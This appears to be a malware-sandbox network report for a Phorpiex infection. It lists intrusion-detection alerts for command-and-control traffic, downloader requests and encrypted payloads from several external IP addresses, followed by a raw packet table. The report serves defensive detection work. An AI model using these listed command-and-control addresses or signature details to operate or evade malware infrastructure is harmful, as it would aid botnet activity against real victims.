                                            2024-09-17T23:10:25.439810+0200 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.4 | 49756 | 91.202.233.141 | 80 | TCP
                                            2024-09-17T23:10:28.348342+0200 | 2044077 | ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC | 1 | 192.168.2.4 | 59145 | 37.255.23.100 | 40500 | UDP
                                            2024-09-17T23:10:29.317891+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49758 | 185.215.113.66 | 80 | TCP
                                            2024-09-17T23:10:29.317891+0200 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.4 | 49758 | 185.215.113.66 | 80 | TCP
                                            2024-09-17T23:10:31.032415+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49759 | 185.215.113.66 | 80 | TCP
                                            2024-09-17T23:10:31.032415+0200 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.4 | 49759 | 185.215.113.66 | 80 | TCP
                                            2024-09-17T23:10:37.676890+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49762 | 185.215.113.66 | 80 | TCP
                                            2024-09-17T23:10:37.676890+0200 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.4 | 49762 | 185.215.113.66 | 80 | TCP
                                            2024-09-17T23:10:38.364094+0200 | 2044077 | ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC | 1 | 192.168.2.4 | 59145 | 178.253.109.195 | 40500 | UDP
                                            2024-09-17T23:10:40.456563+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49764 | 185.215.113.66 | 80 | TCP
                                            2024-09-17T23:10:40.456563+0200 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.4 | 49764 | 185.215.113.66 | 80 | TCP
                                            2024-09-17T23:10:43.194117+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49766 | 185.215.113.66 | 80 | TCP
                                            2024-09-17T23:10:43.194117+0200 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.4 | 49766 | 185.215.113.66 | 80 | TCP
                                            2024-09-17T23:10:43.380318+0200 | 2044077 | ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC | 1 | 192.168.2.4 | 59145 | 5.236.253.124 | 40500 | UDP
                                            2024-09-17T23:10:46.044400+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49767 | 185.215.113.66 | 80 | TCP
                                            2024-09-17T23:10:46.044400+0200 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.4 | 49767 | 185.215.113.66 | 80 | TCP
                                            2024-09-17T23:10:48.397244+0200 | 2044077 | ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC | 1 | 192.168.2.4 | 59145 | 213.230.127.213 | 40500 | UDP
                                            2024-09-17T23:10:48.784910+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49769 | 185.215.113.66 | 80 | TCP
                                            2024-09-17T23:10:48.784910+0200 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.4 | 49769 | 185.215.113.66 | 80 | TCP
                                            2024-09-17T23:10:53.491643+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49770 | 77.91.77.92 | 80 | TCP
                                            2024-09-17T23:10:53.491643+0200 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.4 | 49770 | 77.91.77.92 | 80 | TCP
                                            2024-09-17T23:10:57.334445+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49772 | 77.91.77.92 | 80 | TCP
                                            2024-09-17T23:10:57.334445+0200 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.4 | 49772 | 77.91.77.92 | 80 | TCP
                                            2024-09-17T23:10:58.514941+0200 | 2044077 | ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC | 1 | 192.168.2.4 | 59145 | 89.43.145.18 | 40500 | UDP
                                            2024-09-17T23:11:01.041077+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49774 | 77.91.77.92 | 80 | TCP
                                            2024-09-17T23:11:01.041077+0200 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.4 | 49774 | 77.91.77.92 | 80 | TCP
                                            2024-09-17T23:11:03.520358+0200 | 2044077 | ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC | 1 | 192.168.2.4 | 59145 | 79.165.23.131 | 40500 | UDP
                                            2024-09-17T23:11:04.737217+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49776 | 77.91.77.92 | 80 | TCP
                                            2024-09-17T23:11:04.737217+0200 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.4 | 49776 | 77.91.77.92 | 80 | TCP
                                            2024-09-17T23:11:08.444057+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49777 | 77.91.77.92 | 80 | TCP
                                            2024-09-17T23:11:08.444057+0200 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.4 | 49777 | 77.91.77.92 | 80 | TCP
                                            2024-09-17T23:11:12.115917+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49779 | 77.91.77.92 | 80 | TCP
                                            2024-09-17T23:11:12.115917+0200 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.4 | 49779 | 77.91.77.92 | 80 | TCP
                                            2024-09-17T23:11:13.541304+0200 | 2044077 | ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC | 1 | 192.168.2.4 | 59145 | 151.240.79.133 | 40500 | UDP
                                            2024-09-17T23:11:16.142994+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49781 | 91.202.233.141 | 80 | TCP
                                            2024-09-17T23:11:16.142994+0200 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.4 | 49781 | 91.202.233.141 | 80 | TCP
                                            2024-09-17T23:11:17.859805+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49782 | 91.202.233.141 | 80 | TCP
                                            2024-09-17T23:11:17.859805+0200 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.4 | 49782 | 91.202.233.141 | 80 | TCP
                                            2024-09-17T23:11:23.570592+0200 | 2044077 | ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC | 1 | 192.168.2.4 | 59145 | 178.88.111.20 | 40500 | UDP
                                            2024-09-17T23:11:24.665171+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49785 | 91.202.233.141 | 80 | TCP
                                            2024-09-17T23:11:24.665171+0200 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.4 | 49785 | 91.202.233.141 | 80 | TCP
                                            2024-09-17T23:11:27.404856+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49786 | 91.202.233.141 | 80 | TCP
                                            2024-09-17T23:11:27.404856+0200 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.4 | 49786 | 91.202.233.141 | 80 | TCP
                                            2024-09-17T23:11:30.236762+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49788 | 91.202.233.141 | 80 | TCP
                                            2024-09-17T23:11:30.236762+0200 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.4 | 49788 | 91.202.233.141 | 80 | TCP
                                            2024-09-17T23:11:33.050771+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49789 | 91.202.233.141 | 80 | TCP
                                            2024-09-17T23:11:33.050771+0200 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.4 | 49789 | 91.202.233.141 | 80 | TCP
                                            2024-09-17T23:11:35.900980+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49791 | 91.202.233.141 | 80 | TCP
                                            2024-09-17T23:11:35.900980+0200 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.4 | 49791 | 91.202.233.141 | 80 | TCP
                                            2024-09-17T23:11:39.986361+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49793 | 185.215.113.66 | 80 | TCP
                                            2024-09-17T23:11:39.986361+0200 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.4 | 49793 | 185.215.113.66 | 80 | TCP
                                            2024-09-17T23:11:41.832654+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49794 | 185.215.113.66 | 80 | TCP
                                            2024-09-17T23:11:41.832654+0200 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.4 | 49794 | 185.215.113.66 | 80 | TCP
                                            2024-09-17T23:11:43.982652+0200 | 2837677 | ETPRO MALWARE Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature) | 1 | 185.215.113.66 | 80 | 192.168.2.4 | 49794 | TCP
                                            2024-09-17T23:11:46.807316+0200 | 2837677 | ETPRO MALWARE Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature) | 1 | 185.215.113.66 | 80 | 192.168.2.4 | 49796 | TCP
                                            2024-09-17T23:11:47.503983+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49797 | 185.215.113.66 | 80 | TCP
                                            2024-09-17T23:11:47.503983+0200 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.4 | 49797 | 185.215.113.66 | 80 | TCP
                                            2024-09-17T23:11:50.288976+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49799 | 185.215.113.66 | 80 | TCP
                                            2024-09-17T23:11:50.288976+0200 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.4 | 49799 | 185.215.113.66 | 80 | TCP
                                            2024-09-17T23:11:53.080321+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49800 | 185.215.113.66 | 80 | TCP
                                            2024-09-17T23:11:53.080321+0200 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.4 | 49800 | 185.215.113.66 | 80 | TCP
                                            2024-09-17T23:11:55.821523+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49802 | 185.215.113.66 | 80 | TCP
                                            2024-09-17T23:11:55.821523+0200 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.4 | 49802 | 185.215.113.66 | 80 | TCP
                                            2024-09-17T23:11:58.781922+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49803 | 185.215.113.66 | 80 | TCP
                                            2024-09-17T23:11:58.781922+0200 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.4 | 49803 | 185.215.113.66 | 80 | TCP
                                            2024-09-17T23:12:03.475094+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49805 | 77.91.77.92 | 80 | TCP
                                            2024-09-17T23:12:03.475094+0200 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.4 | 49805 | 77.91.77.92 | 80 | TCP
                                            2024-09-17T23:12:07.188452+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49807 | 77.91.77.92 | 80 | TCP
                                            2024-09-17T23:12:07.188452+0200 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.4 | 49807 | 77.91.77.92 | 80 | TCP
                                            2024-09-17T23:12:10.900881+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44980977.91.77.9280TCP
                                            2024-09-17T23:12:10.900881+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44980977.91.77.9280TCP
                                            2024-09-17T23:12:14.779580+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44981077.91.77.9280TCP
                                            2024-09-17T23:12:14.779580+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44981077.91.77.9280TCP
                                            2024-09-17T23:12:18.495368+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44981277.91.77.9280TCP
                                            2024-09-17T23:12:18.495368+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44981277.91.77.9280TCP
                                            2024-09-17T23:12:18.707808+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.4591452.185.144.15740500UDP
                                            2024-09-17T23:12:22.405916+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44981477.91.77.9280TCP
                                            2024-09-17T23:12:22.405916+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44981477.91.77.9280TCP
                                            2024-09-17T23:12:23.724097+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.45914578.39.225.2740500UDP
                                            2024-09-17T23:12:26.510035+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44981691.202.233.14180TCP
                                            2024-09-17T23:12:26.510035+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44981691.202.233.14180TCP
                                            2024-09-17T23:12:28.739574+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.45914537.228.65.18540500UDP
                                            2024-09-17T23:12:28.823664+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44981791.202.233.14180TCP
                                            2024-09-17T23:12:28.823664+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44981791.202.233.14180TCP
                                            2024-09-17T23:12:35.986822+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44982091.202.233.14180TCP
                                            2024-09-17T23:12:35.986822+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44982091.202.233.14180TCP
                                            2024-09-17T23:12:38.729098+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44982191.202.233.14180TCP
                                            2024-09-17T23:12:38.729098+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44982191.202.233.14180TCP
                                            2024-09-17T23:12:38.848779+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.459145149.54.47.9040500UDP
                                            2024-09-17T23:12:41.467262+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44982391.202.233.14180TCP
                                            2024-09-17T23:12:41.467262+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44982391.202.233.14180TCP
                                            2024-09-17T23:12:44.777939+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44982591.202.233.14180TCP
                                            2024-09-17T23:12:44.777939+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44982591.202.233.14180TCP
                                            2024-09-17T23:12:47.533845+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44982691.202.233.14180TCP
                                            2024-09-17T23:12:47.533845+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44982691.202.233.14180TCP
                                            2024-09-17T23:12:51.407501+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449828185.215.113.6680TCP
                                            2024-09-17T23:12:51.407501+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449828185.215.113.6680TCP
                                            2024-09-17T23:12:53.879963+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.459145188.215.175.8940500UDP
                                            2024-09-17T23:12:54.150335+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449829185.215.113.6680TCP
                                            2024-09-17T23:12:54.150335+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449829185.215.113.6680TCP
                                            2024-09-17T23:12:56.871465+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449831185.215.113.6680TCP
                                            2024-09-17T23:12:56.871465+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449831185.215.113.6680TCP
                                            2024-09-17T23:12:58.897691+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.459145100.109.48.4340500UDP
                                            2024-09-17T23:12:59.607090+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449832185.215.113.6680TCP
                                            2024-09-17T23:12:59.607090+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449832185.215.113.6680TCP
                                            2024-09-17T23:13:02.354191+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449834185.215.113.6680TCP
                                            2024-09-17T23:13:02.354191+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449834185.215.113.6680TCP
                                            2024-09-17T23:13:05.072325+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449836185.215.113.6680TCP
                                            2024-09-17T23:13:05.072325+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.449836185.215.113.6680TCP
                                            2024-09-17T23:13:09.923770+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44983777.91.77.9280TCP
                                            2024-09-17T23:13:09.923770+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44983777.91.77.9280TCP
                                            2024-09-17T23:13:13.779440+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44983977.91.77.9280TCP
                                            2024-09-17T23:13:13.779440+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.44983977.91.77.9280TCP
Timestamp  Source Port  Dest Port  Source IP  Dest IP
Sep 17, 2024 23:09:15.563776970 CEST  49730  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:09:15.568891048 CEST  80  49730  185.215.113.66  192.168.2.4
Sep 17, 2024 23:09:15.569032907 CEST  49730  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:09:15.569209099 CEST  49730  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:09:15.574179888 CEST  80  49730  185.215.113.66  192.168.2.4
Sep 17, 2024 23:09:16.259267092 CEST  80  49730  185.215.113.66  192.168.2.4
Sep 17, 2024 23:09:16.259324074 CEST  80  49730  185.215.113.66  192.168.2.4
Sep 17, 2024 23:09:16.259356022 CEST  80  49730  185.215.113.66  192.168.2.4
Sep 17, 2024 23:09:16.259430885 CEST  49730  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:09:16.259430885 CEST  49730  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:09:16.259430885 CEST  49730  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:09:16.259716988 CEST  80  49730  185.215.113.66  192.168.2.4
Sep 17, 2024 23:09:16.259732008 CEST  80  49730  185.215.113.66  192.168.2.4
Sep 17, 2024 23:09:16.259747982 CEST  80  49730  185.215.113.66  192.168.2.4
Sep 17, 2024 23:09:16.259908915 CEST  49730  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:09:16.259910107 CEST  49730  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:09:16.260427952 CEST  80  49730  185.215.113.66  192.168.2.4
Sep 17, 2024 23:09:16.260624886 CEST  49730  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:09:16.263004065 CEST  49730  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:09:16.263041019 CEST  49730  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:09:17.269658089 CEST  49732  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:09:17.274545908 CEST  80  49732  185.215.113.66  192.168.2.4
Sep 17, 2024 23:09:17.274611950 CEST  49732  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:09:17.274733067 CEST  49732  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:09:17.279483080 CEST  80  49732  185.215.113.66  192.168.2.4
Sep 17, 2024 23:09:17.984699965 CEST  80  49732  185.215.113.66  192.168.2.4
Sep 17, 2024 23:09:17.984724045 CEST  80  49732  185.215.113.66  192.168.2.4
Sep 17, 2024 23:09:17.984756947 CEST  80  49732  185.215.113.66  192.168.2.4
Sep 17, 2024 23:09:17.984778881 CEST  49732  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:09:17.984824896 CEST  49732  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:09:17.985251904 CEST  80  49732  185.215.113.66  192.168.2.4
Sep 17, 2024 23:09:17.985268116 CEST  80  49732  185.215.113.66  192.168.2.4
Sep 17, 2024 23:09:17.985284090 CEST  80  49732  185.215.113.66  192.168.2.4
Sep 17, 2024 23:09:17.985316992 CEST  49732  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:09:17.985316992 CEST  49732  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:09:17.985337019 CEST  49732  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:09:17.985702038 CEST  80  49732  185.215.113.66  192.168.2.4
Sep 17, 2024 23:09:17.985749960 CEST  49732  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:09:18.072895050 CEST  80  49732  185.215.113.66  192.168.2.4
Sep 17, 2024 23:09:18.072948933 CEST  49732  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:09:18.093730927 CEST  49733  40500  192.168.2.4  5.234.221.184
Sep 17, 2024 23:09:18.098836899 CEST  40500  49733  5.234.221.184  192.168.2.4
Sep 17, 2024 23:09:18.098906040 CEST  49733  40500  192.168.2.4  5.234.221.184
Sep 17, 2024 23:09:18.100330114 CEST  49733  40500  192.168.2.4  5.234.221.184
Sep 17, 2024 23:09:18.105200052 CEST  40500  49733  5.234.221.184  192.168.2.4
Sep 17, 2024 23:09:18.105262041 CEST  49733  40500  192.168.2.4  5.234.221.184
Sep 17, 2024 23:09:18.110084057 CEST  40500  49733  5.234.221.184  192.168.2.4
Sep 17, 2024 23:09:20.232733965 CEST  49732  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:09:20.233184099 CEST  49734  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:09:20.237736940 CEST  49733  40500  192.168.2.4  5.234.221.184
Sep 17, 2024 23:09:20.238115072 CEST  80  49732  185.215.113.66  192.168.2.4
Sep 17, 2024 23:09:20.238131046 CEST  80  49734  185.215.113.66  192.168.2.4
Sep 17, 2024 23:09:20.238190889 CEST  49732  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:09:20.238241911 CEST  49734  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:09:20.238425970 CEST  49734  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:09:20.243248940 CEST  80  49734  185.215.113.66  192.168.2.4
Sep 17, 2024 23:09:20.285351038 CEST  40500  49733  5.234.221.184  192.168.2.4
Sep 17, 2024 23:09:20.952914000 CEST  80  49734  185.215.113.66  192.168.2.4
Sep 17, 2024 23:09:20.953022003 CEST  49734  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:09:20.953231096 CEST  80  49734  185.215.113.66  192.168.2.4
Sep 17, 2024 23:09:20.953250885 CEST  80  49734  185.215.113.66  192.168.2.4
Sep 17, 2024 23:09:20.953280926 CEST  49734  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:09:20.953288078 CEST  80  49734  185.215.113.66  192.168.2.4
Sep 17, 2024 23:09:20.953299999 CEST  80  49734  185.215.113.66  192.168.2.4
Sep 17, 2024 23:09:20.953336954 CEST  49734  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:09:20.953783035 CEST  80  49734  185.215.113.66  192.168.2.4
Sep 17, 2024 23:09:20.953793049 CEST  80  49734  185.215.113.66  192.168.2.4
Sep 17, 2024 23:09:20.953804970 CEST  80  49734  185.215.113.66  192.168.2.4
Sep 17, 2024 23:09:20.953808069 CEST  49734  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:09:20.953828096 CEST  49734  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:09:20.953847885 CEST  49734  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:09:21.039796114 CEST  80  49734  185.215.113.66  192.168.2.4
Sep 17, 2024 23:09:21.039861917 CEST  49734  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:09:23.163697958 CEST  49734  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:09:23.168615103 CEST  80  49734  185.215.113.66  192.168.2.4
Sep 17, 2024 23:09:23.386266947 CEST  80  49734  185.215.113.66  192.168.2.4
Sep 17, 2024 23:09:23.386341095 CEST  49734  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:09:25.238234997 CEST  49736  40500  192.168.2.4  77.244.144.31
Sep 17, 2024 23:09:25.243275881 CEST  40500  49736  77.244.144.31  192.168.2.4
Sep 17, 2024 23:09:25.243546009 CEST  49736  40500  192.168.2.4  77.244.144.31
Sep 17, 2024 23:09:25.244862080 CEST  49736  40500  192.168.2.4  77.244.144.31
Sep 17, 2024 23:09:25.249689102 CEST  40500  49736  77.244.144.31  192.168.2.4
Sep 17, 2024 23:09:25.249753952 CEST  49736  40500  192.168.2.4  77.244.144.31
Sep 17, 2024 23:09:25.254558086 CEST  40500  49736  77.244.144.31  192.168.2.4
Sep 17, 2024 23:09:25.442640066 CEST  49734  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:09:25.447555065 CEST  80  49734  185.215.113.66  192.168.2.4
Sep 17, 2024 23:09:25.664438009 CEST  80  49734  185.215.113.66  192.168.2.4
Sep 17, 2024 23:09:25.665035009 CEST  49734  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:09:27.174693108 CEST  40500  49736  77.244.144.31  192.168.2.4
Sep 17, 2024 23:09:27.176961899 CEST  49736  40500  192.168.2.4  77.244.144.31
Sep 17, 2024 23:09:27.692382097 CEST  49734  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:09:27.697344065 CEST  80  49734  185.215.113.66  192.168.2.4
Sep 17, 2024 23:09:27.915556908 CEST  80  49734  185.215.113.66  192.168.2.4
Sep 17, 2024 23:09:27.916076899 CEST  49734  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:09:29.942568064 CEST  49734  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:09:29.947510958 CEST  80  49734  185.215.113.66  192.168.2.4
Sep 17, 2024 23:09:30.163774967 CEST  80  49734  185.215.113.66  192.168.2.4
Sep 17, 2024 23:09:30.163885117 CEST  49734  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:09:32.192881107 CEST  49734  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:09:32.198102951 CEST  80  49734  185.215.113.66  192.168.2.4
Sep 17, 2024 23:09:32.414632082 CEST  80  49734  185.215.113.66  192.168.2.4
Sep 17, 2024 23:09:32.414764881 CEST  49734  80  192.168.2.4  185.215.113.66
Sep 17, 2024 23:09:35.253098965 CEST  49736  40500  192.168.2.4  77.244.144.31
Sep 17, 2024 23:09:35.258114100 CEST  40500  49736  77.244.144.31  192.168.2.4
Sep 17, 2024 23:09:35.459579945 CEST  49738  80  192.168.2.4  77.91.77.92
Sep 17, 2024 23:09:35.464518070 CEST  80  49738  77.91.77.92  192.168.2.4
Sep 17, 2024 23:09:35.464708090 CEST  49738  80  192.168.2.4  77.91.77.92
Sep 17, 2024 23:09:35.464857101 CEST  49738  80  192.168.2.4  77.91.77.92
Sep 17, 2024 23:09:35.469899893 CEST  80  49738  77.91.77.92  192.168.2.4
Sep 17, 2024 23:09:37.130520105 CEST  80  49738  77.91.77.92  192.168.2.4
Sep 17, 2024 23:09:37.130578041 CEST  49738  80  192.168.2.4  77.91.77.92
Sep 17, 2024 23:09:37.130789042 CEST  49738  80  192.168.2.4  77.91.77.92
Sep 17, 2024 23:09:37.135792017 CEST  80  49738  77.91.77.92  192.168.2.4
Sep 17, 2024 23:09:39.236645937 CEST  49741  80  192.168.2.4  77.91.77.92
Sep 17, 2024 23:09:39.241666079 CEST  80  49741  77.91.77.92  192.168.2.4
